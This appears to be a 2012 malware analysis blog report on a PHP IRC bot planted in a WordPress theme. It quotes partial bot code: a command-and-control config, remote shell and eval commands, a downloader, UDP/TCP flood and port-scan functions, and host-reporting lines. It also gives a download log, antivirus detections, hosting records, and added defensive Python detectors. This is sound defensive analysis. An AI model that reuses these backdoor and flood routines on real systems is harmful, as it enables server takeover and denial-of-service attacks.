unixfreaxjp

#OCJP-040 New Variant PHP/IRC DoS Tools (Win32/Posix)

May 2nd, 2012
==============================
Operation Cleanup Japan
report: #OCJP-040
Base: http://unixfreaxjp.blogspot.jp/2012/05/ocjp-040.html
VT: https://www.virustotal.com/file/530d50212bf404cf82a40532ec90f90ea9a6533e3d38a233f8d34c15d10a0e8c/analysis/1335907672/
==============================
This is a PHP IRC bot found on a Japanese IDC server that was running a vulnerable WordPress theme plugin.
It is currently under investigation as #OCJP case OCJP-040.

Below is the evidence of the object's malicious functionality:
==================
IRC-based bot:
==================
The bot connects to irc.s4l1ty.info on port 6667, joins the channel #zero and accepts commands prefixed with "." from any hostmask ("hostauth"=>"*"):
var $config = array("server"=>"irc.s4l1ty.info",
"port"=>6667,
"pass"=>"zero",
"prefix"=>"ZERO",
"maxrand"=>8,
"chan"=>"#zero",
"key"=>"",
"modes"=>"+iB-x",
"password"=>"zero",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname

==================
DNS Lookup
==================
Resolves names and addresses on the operator's behalf (gethostbyaddr() for an IP, gethostbyname() for a host) and posts the result to the channel:
config.inc.txt(15): * .dns <IP|HOST> //dns lookup
config.inc.txt(206): case "dns":
config.inc.txt(212): $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
config.inc.txt(216): $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));

==================
SERVER REMOTE EXECUTION
==================
Designed to run arbitrary shell commands on the host, Unix or Windows, wherever PHP is installed; the fourth command evaluates arbitrary PHP code inside the web server process:

* .sexec <cmd> // uses shell_exec() //execute a command
* .exec <cmd> // uses exec() //execute a command
* .cmd <cmd> // uses popen() //execute a command
* .php <php code> // uses eval() //execute php code

==================
DOWNLOADER
==================
Download interface onto the compromised system (fetches a URL and writes it to a local path):
* .download <URL> <filename> //download a file
else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }


==================
HACKER GROUP ATTACK TOOLS
==================
The tool's own header attributes it to this group:
#crew@corp. since 2003
edited by: devil__ and MEIAFASE <admin@xdevil.org> <meiafase@pucorp.org>
Friend: LP <fuckerboy@sercret.gov>


==================
INFECTION NOTIFICATION
==================
The bot reports the infected machine to an IRC channel: its uname string, a safe-mode flag, and the URL of the vulnerable host and script it is running from (built from $_SERVER):
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");

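The C2 config and the report format above give network-side indicators. What follows is an added example, not code from this report or from the bot, that scores a captured client-to-server IRC stream against them. It assumes that the "pass" value is sent as the IRC PASS command and that the nick is the prefix "ZERO" followed by up to "maxrand"=8 random digits; the report does not quote the code that does either. The two sessions are constructed for illustration.

```python
import re

# IoCs from the config excerpt above. Treating "pass" as the IRC PASS and
# "maxrand"=>8 as "up to 8 random digits after the prefix" are assumptions.
C2 = {"server": "irc.s4l1ty.info", "port": 6667, "pass": "zero", "chan": "#zero"}
NICK_RE = re.compile(r'^ZERO\d{1,8}$')
# "[\2tag\2]: ..." report lines; \2 in the PHP source is octal for 0x02 (IRC bold).
REPORT_RE = re.compile(
    r'^\[\x02(uname!|vuln!|info|dns|pscan|download|inbox|TcpFlood Started!)\x02\]')

def analyse_session(dst_host, dst_port, client_lines):
    """Reconstruct registration state from client->server IRC lines and
    return (matched indicator names, state)."""
    state = {"pass": None, "nick": None, "chans": set(), "reports": []}
    for raw in client_lines:
        parts = raw.rstrip("\r\n").split(" ", 2)
        cmd = parts[0].upper()
        if cmd == "PASS" and len(parts) > 1:
            state["pass"] = parts[1]
        elif cmd == "NICK" and len(parts) > 1:
            state["nick"] = parts[1]
        elif cmd == "JOIN" and len(parts) > 1:
            state["chans"].update(parts[1].split(","))      # JOIN #a,#b [keys]
        elif cmd == "PRIVMSG" and len(parts) == 3:
            text = parts[2][1:] if parts[2].startswith(":") else parts[2]
            if REPORT_RE.match(text):
                state["reports"].append(text)
    matched = []
    if (dst_host, dst_port) == (C2["server"], C2["port"]):
        matched.append("c2_endpoint")
    if state["pass"] == C2["pass"]:
        matched.append("irc_pass")
    if state["nick"] and NICK_RE.match(state["nick"]):
        matched.append("nick_pattern")
    if C2["chan"] in state["chans"]:
        matched.append("channel")
    if state["reports"]:
        matched.append("bot_report_format")
    return matched, state

# Constructed sessions (not captured traffic). The vuln! line carries the URL
# the bot runs from, built the way the excerpt above builds it from $_SERVER.
BOT_SESSION = [
    "PASS zero",
    "NICK ZERO48213907",
    "USER ZERO48213907 8 * :ZERO48213907",
    "JOIN #zero",
    "PRIVMSG #zero :[\x02uname!\x02]: Linux web01 2.6.32 #1 SMP x86_64 (safe: off)",
    "PRIVMSG #zero :[\x02vuln!\x02]: http://www.example.invalid/wp-content/themes/autofocus/config.inc.txt",
]
HUMAN_SESSION = [
    "NICK alice",
    "USER alice 0 * :Alice",
    "JOIN #wordpress",
    "PRIVMSG #wordpress :anyone around?",
]

if __name__ == "__main__":
    for host, port, lines in ((C2["server"], C2["port"], BOT_SESSION),
                              ("irc.example.invalid", 6697, HUMAN_SESSION)):
        matched, state = analyse_session(host, port, lines)
        print(host, port, state["nick"], "->", matched or "clean")
```

Any one indicator alone is weak (a human could pick the nick "ZERO1"); the endpoint plus the PASS plus the bold-tag report format together are the pBot fingerprint, so alert on two or more matches rather than on the nick pattern by itself.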
==================
DoS / DDoS ATTACK TOOLS
==================
Three attack functions:

TCP FLOOD
-----------
* .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
case "tcpflood":
if(count($mcmd)>5)
{$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++)


UDP FLOOD
-----------
* .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"[\2Attack Iniciado com sucesso!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);fclose($fp);$i++;

The start message is Portuguese ("Attack started successfully!"). Note that the help text advertises four arguments but the function takes three ($host, $packetsize, $time): for <time> seconds it opens a UDP socket to a random destination port in 0-6000 and sends one <packetsize>-byte random payload per iteration, so the target sees a single source spraying many ports.

PORT SCANNING
-----------
* .pscan <host> <port> //port scan
case "pscan": // .pscan 6667
if(count($mcmd) > 2)
{ if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");

A single TCP connect with a 15-second timeout, with the open/closed result posted back to the channel.

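Seen from the network, the udpflood() loop is one source opening UDP sockets to random destination ports on a single target for several seconds. The following added example, which is not part of the report, flags that pattern in iptables LOG-style syslog lines by counting distinct destination ports per (src, dst) pair inside a sliding time window. The log lines are constructed, and the window and threshold values are assumptions to tune against your own traffic.

```python
import re
from collections import defaultdict, deque

# iptables LOG-style syslog line; only the fields we need are captured.
LINE_RE = re.compile(
    r'^\w{3}\s+\d+\s+(\d\d):(\d\d):(\d\d)\s+\S+\s+kernel:.*?'
    r'SRC=(\S+)\s+DST=(\S+).*?PROTO=(\w+).*?DPT=(\d+)')

def parse(line):
    """-> (seconds_of_day, src, dst, proto, dpt), or None for non-matching lines."""
    m = LINE_RE.search(line)
    if not m:
        return None
    h, mi, s, src, dst, proto, dpt = m.groups()
    return int(h) * 3600 + int(mi) * 60 + int(s), src, dst, proto, int(dpt)

def detect_port_spray(lines, window=10, min_ports=20, proto="UDP"):
    """Return {(src, dst): peak distinct dst ports} for pairs that hit at least
    `min_ports` distinct ports of `proto` within any `window`-second span."""
    events = sorted(e for e in map(parse, lines) if e and e[3] == proto)
    recent = defaultdict(deque)            # (src, dst) -> deque[(t, dpt)]
    alerts = {}
    for t, src, dst, _, dpt in events:
        q = recent[(src, dst)]
        q.append((t, dpt))
        while t - q[0][0] > window:         # drop events older than the window
            q.popleft()
        distinct = len({p for _, p in q})
        if distinct >= min_ports:
            alerts[(src, dst)] = max(alerts.get((src, dst), 0), distinct)
    return alerts

# Constructed sample (not from the report): web01 sprays 40 UDP datagrams at
# deterministic pseudo-random ports in 0-6000 on one target within 4 seconds,
# which is what the udpflood() loop produces, plus ordinary DNS and HTTPS.
def _line(sec, src, dst, proto, dpt):
    return (f"May  2 14:35:{sec:02d} web01 kernel: IN= OUT=eth0 SRC={src} DST={dst} "
            f"LEN=1060 TOS=0x00 PREC=0x00 TTL=64 PROTO={proto} SPT={40000 + sec} "
            f"DPT={dpt} LEN=1040")

SAMPLE_LOG = "\n".join(
    [_line(i // 10, "10.0.0.5", "203.0.113.9", "UDP", (i * 997) % 6001) for i in range(40)]
    + [_line(i // 5, "10.0.0.5", "198.51.100.53", "UDP", 53) for i in range(30)]
    + [_line(i, "10.0.0.5", "198.51.100.10", "TCP", 443) for i in range(6)]
)

if __name__ == "__main__":
    for (src, dst), n in detect_port_spray(SAMPLE_LOG.splitlines()).items():
        print(f"ALERT udp port spray {src} -> {dst}: {n} distinct dst ports in 10s")
```

Counting distinct destination ports rather than packet volume is what separates this from a busy DNS resolver (many packets, one port) and keeps the rule cheap enough to run on an egress firewall log; a web server that legitimately talks UDP to dozens of ports on one host is rare enough to investigate.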
==================
Portuguese language is used a lot:
==================
Impossivel mandar e-mail.");   ("Unable to send e-mail.")
ensagem enviada para \2   ("[M]essage sent to")
Nao foi possivel fazer o download. Permissao negada.   ("Could not download. Permission denied.")

==================
SPYWARE
==================
The inbox function uses PHP mail() to e-mail the infected system's details (IP $c, server software $b, OS $a) to an address supplied over IRC, and the same primitive can be reused for spamming; the info function posts the uname and safe-mode state to the channel:
if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \n
{$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");}
else {$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");}
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");

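Taken together, the sections above (the IRC config, remote execution, downloader, DoS and spyware functions) give a static indicator set for triaging a compromised web root. The following is an added example, not the report's analysis code and not the bot, that scores PHP sources against those indicators and additionally flags PHP code stored in a non-.php file, as this sample was (config.inc.txt inside a theme directory). The file contents are constructed mimics of the quoted patterns and the indicator weights are an assumption chosen for illustration.

```python
import re

# Indicator regexes derived from the excerpts quoted in this report.
CONFIG_KEYS = re.compile(
    r'"(server|port|pass|prefix|maxrand|chan|trigger|hostauth)"\s*=>')
INDICATORS = [  # (name, regex, weight) ; weights are an illustrative assumption
    ("irc_protocol",  re.compile(r'\b(PRIVMSG|NICK|JOIN|USER|PONG)\b'), 2),
    ("cmd_exec",      re.compile(r'\b(shell_exec|exec|popen|passthru|system)\s*\('), 2),
    ("php_eval",      re.compile(r'\beval\s*\('), 2),
    ("udp_socket",    re.compile(r'fsockopen\s*\(\s*["\']udp://'), 3),
    ("mail_report",   re.compile(r'\bmail\s*\('), 1),
    ("irc_bold_tags", re.compile(r'\\2(uname!|vuln!|download|pscan|inbox|dns)\\2'), 3),
]
PHP_OPEN = re.compile(r'<\?php')

def scan_source(path, text):
    """Return (score, {indicator: hit count}) for one file's contents."""
    hits, score = {}, 0
    keys = set(CONFIG_KEYS.findall(text))
    if len(keys) >= 3:                       # a whole IRC config block, not a stray key
        hits["irc_config"] = len(keys)
        score += 3
    for name, rx, weight in INDICATORS:
        n = len(rx.findall(text))
        if n:
            hits[name] = n
            score += weight
    # PHP code in a file the web server serves as text/plain (config.inc.txt above)
    if not path.lower().endswith(".php") and PHP_OPEN.search(text):
        hits["php_in_non_php"] = 1
        score += 2
    return score, hits

def triage(files, threshold=8):
    """files: {path: contents}. Returns [(path, score, hits)] at or above
    threshold, highest score first."""
    results = [(p, *scan_source(p, t)) for p, t in files.items()]
    return sorted((r for r in results if r[1] >= threshold),
                  key=lambda r: r[1], reverse=True)

# Constructed sample tree (NOT the real sample): one bot-like file mimicking the
# quoted patterns, a benign theme file, and a benign admin script that calls exec().
SAMPLE_FILES = {
    "wp-content/themes/autofocus/config.inc.txt": r'''<?php
class pBot {
  var $config = array("server"=>"irc.example.invalid","port"=>6667,"pass"=>"zero",
    "prefix"=>"ZERO","maxrand"=>8,"chan"=>"#zero","trigger"=>".","hostauth"=>"*");
  function privmsg($to,$msg){ fwrite($this->conn,"PRIVMSG $to :$msg\r\n"); }
  function udpflood($host,$packetsize,$time){
    $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); fwrite($fp,$packet); }
  function run($cmd){ $this->privmsg($this->config['chan'],"[\2uname!\2]: ".shell_exec($cmd)); eval($cmd); }
}
''',
    "wp-content/themes/autofocus/functions.php": r'''<?php
add_action('after_setup_theme', 'autofocus_setup');
function autofocus_setup() { add_theme_support('post-thumbnails'); }
''',
    "tools/backup.php": r'''<?php
// admin-only maintenance script: one exec() call, no sockets
exec('tar czf /var/backups/site.tgz /var/www/html');
''',
}

if __name__ == "__main__":
    for path, score, hits in triage(SAMPLE_FILES):
        print(f"{score:3d} {path} {hits}")
```

The threshold is deliberately above the score of a lone exec() or mail() call, which plenty of legitimate plugins contain; what pushes the bot over it is the co-occurrence of an IRC config block, IRC protocol verbs and the bold-tagged reply format in one file, which is the combination worth pulling for manual review.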
================================
MALWARE SOURCE
================================

The bot source was retrieved with wget; note that it is served as text/plain from inside the theme directory:
--14:34:56-- http://happymeme.com/uzumaki//wp-content/themes/autofocus/config.inc.txt
=> `config.inc.txt'
Resolving happymeme.com... 112.78.112.187
Connecting to happymeme.com|112.78.112.187|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23,375 (23K) [text/plain]
100%[====================================>] 23,375 81.18K/s
14:34:59 (80.91 KB/s) - `config.inc.txt' saved [23375/23375]


================================
VIRUS TOTAL
================================
https://www.virustotal.com/file/530d50212bf404cf82a40532ec90f90ea9a6533e3d38a233f8d34c15d10a0e8c/analysis/1335907672/
nProtect : Trojan.Dropper.RYF
K7AntiVirus : Backdoor
VirusBuster : PHP.Shellbot.J
F-Prot : PHP/Pbot.B
Symantec : PHP.Backdoor.Trojan
Norman : PHP/Ircbot.BBPH
TrendMicro-HouseCall : BKDR_PHPBOT.SM
Avast : PHP:IRCBot-AB [Trj]
ClamAV : PHP.Bot
Kaspersky : Backdoor.PHP.Pbot.a
BitDefender : Trojan.Dropper.RYF
Sophos : Troj/PHPBot-F
Comodo : Backdoor.PHP.Pbot.A
F-Secure : Trojan.Dropper.RYF
DrWeb : PHP.BackDoor.14
VIPRE : Backdoor.PHP.Pbot.b (v) (not malicious)
AntiVir : PHP/PBot.A.6
TrendMicro : BKDR_PHPBOT.SM
McAfee-GW-Edition : Heuristic.BehavesLike.JS.Suspicious.G
Emsisoft : Backdoor.PHP.Pbot!IK
eTrust-Vet : PHP/Pbot.D
Jiangmin : Trojan/Script.Gen
Microsoft : Trojan:PHP/Flader.A
GData : Trojan.Dropper.RYF
Commtouch : PHP/Pbot.B
AhnLab-V3 : PHP/Pbot
VBA32 : Backdoor.PHP.Pbot.a
PCTools : Malware.PHP-Backdoor
Rising : Trojan.Script.HTML.Agent.ab
Ikarus : Backdoor.PHP.Pbot
Fortinet : PHP/Pbot.AK!tr.bdr
AVG : PHP/BackDoor.K
Panda : Bck/Pbot.B

================================
NETWORK SOURCE
================================

Routing (AS)
-----------

IP: 112.78.112.187
inetnum: 112.78.112.0 - 112.78.112.255
netname: SAKURA-NET
descr: SAKURA Internet Inc.
country: JP
admin-c: KT749JP
tech-c: KW419JP
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC WHOIS Gateway at
remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or
remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client
remarks: defaults to Japanese output, use the /e switch for English
remarks: output)
changed: apnic-ftp@nic.ad.jp 20090303
changed: apnic-ftp@nic.ad.jp 20090331
source: JPNIC


112.78.112.0/20
SAKURA-C (4/OSAKA) SAKURA Internet // WEST JAPAN BACKBONE
1-8-15 Kyutaro-cho, Chuo Osaka 541-0056, Japan

AS9371
SAKURA-C SAKURA Internet // WEST JAPAN BACKBONE
Sakaisuji Honmachi Bldg. 9F 1-8-14 Minami-Honmachi,
Chuo-ku Osaka 541-0054, Japan


Domain
-----------

Domain Name: happymeme.com
Created On: 2007-02-25 13:40:54.0
Last Updated On: 2012-02-27 21:37:36.0
Expiration Date: 2013-02-25 04:40:54.0
Status: ACTIVE
Registrant Name: Whois Privacy Protection Service
Registrant Organization: paperboy and co.
Registrant Street1: 2-7-21 Tenjin Chuo-ku
Registrant Street2: Tenjin Prime 8F
Registrant City: Fukuoka-shi
Registrant State: Fukuoka
Registrant Postal Code: 8100001
Registrant Country: JP
Registrant Phone: 81-927137999
Registrant Fax: 81-927137944
Tech Email: privacy@whoisprivacyprotection.info
Name Server: ns1.dns.ne.jp
Name Server: ns2.dns.ne.jp

--------------------------------------------------
Host names whose A records resolve to the same IP are
exposed to the same risk given the current findings (112 items)
--------------------------------------------------
194964s.com
2103kakaku.com
aeru21.com
aeruzo.com
aeruzo.net
aitaiyoo.com
aitaizo.com
aitaizo.net
anzen-shisan.com
anzen-toushi.com
b-jays.net
biyo-neosta.com
boku-uma.com
cafebuono.net
carnavi-neosta.com
chanel-neosta.com
chusho-ma.biz
cosmo-support.com
cucina-style.com
cutie-eggs.com
daftbrain.com
dankai-club.com
daveswebworks.com
draxn.net
drbeverlynelson.com
earthworks1.com
ed3s.net
enyasuita.com
extank.com
fukuirin.com
fx-toushi.biz
gaika-yokin.org
gakushi110.com
gan-kenko.com
gooddieter.org
gucci-neosta.com
hajikunshop.com
happyguide.biz
happyguide.info
happymailz.com
happymailz.net
happymeme.com
hlj93.com
hpmls.net
ichikawayuu.com
iheya-genkimura.org
iirufa.com
japangoodsplaza.com
jewelry-neosta.com
ji-joutatsu.com
kanakana-piano.com
kineyakatsuroku.com
koi-iro.com
kojimatsubasa.com
koshunyujob.com
kotaninene.com
kounojimusyo.com
loaddarthtrader.com
lumiere4.com
luxy-party.com
m2051.com
macj-log.com
mail.nagasaka-web.net
mail.s-smile.net
marujyohome.com
mild7-1.net
morigen.info
morita29.com
nagasaka-web.net
newsharaku.com
nibo6.com
nitoroy.com
npo-bsk.com
npo-hima.net
okamotoann.com
onyanco.com
oonoyohei.com
oota-amaharashi.jp
ozakikana.com
penki-nurikae.com
potyari.biz
recorder-neosta.com
redrox.net
reiki-a.com
reiki-dream.net
rightsangyou.com
ryuzo-nakata.com
s-smile.net
sakaidaiki.com
sankei-inc.com
sekengaku.org
sekiaya.com
sheadream.com
shibataindustries.com
shimadadaiki.com
shisan-unyou.info
smileagefan.com
t-zei.jp
ton-kichi.net
toushi-fx.net
uchiyamahinata.com
www.h-sketch.com
www.oota-amaharashi.jp
www.penki-nurikae.com
www.t-zei.jp
xn--torr3dy20axh7a.com (.com)
yamacho-club.com
yen-energy.com
yoke-kichijoji.com
yokohamahikari.com
yosapark-saribaba.com
yurai-seitai.net
------
ZeroDay Japan http://0day.jp
OPERATION CLEANUP JAPAN | #OCJP
Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
sponsored by: 株式会社ケイエルジェイテック (KLJ Tech Co., Ltd.) http://www.kljtech.com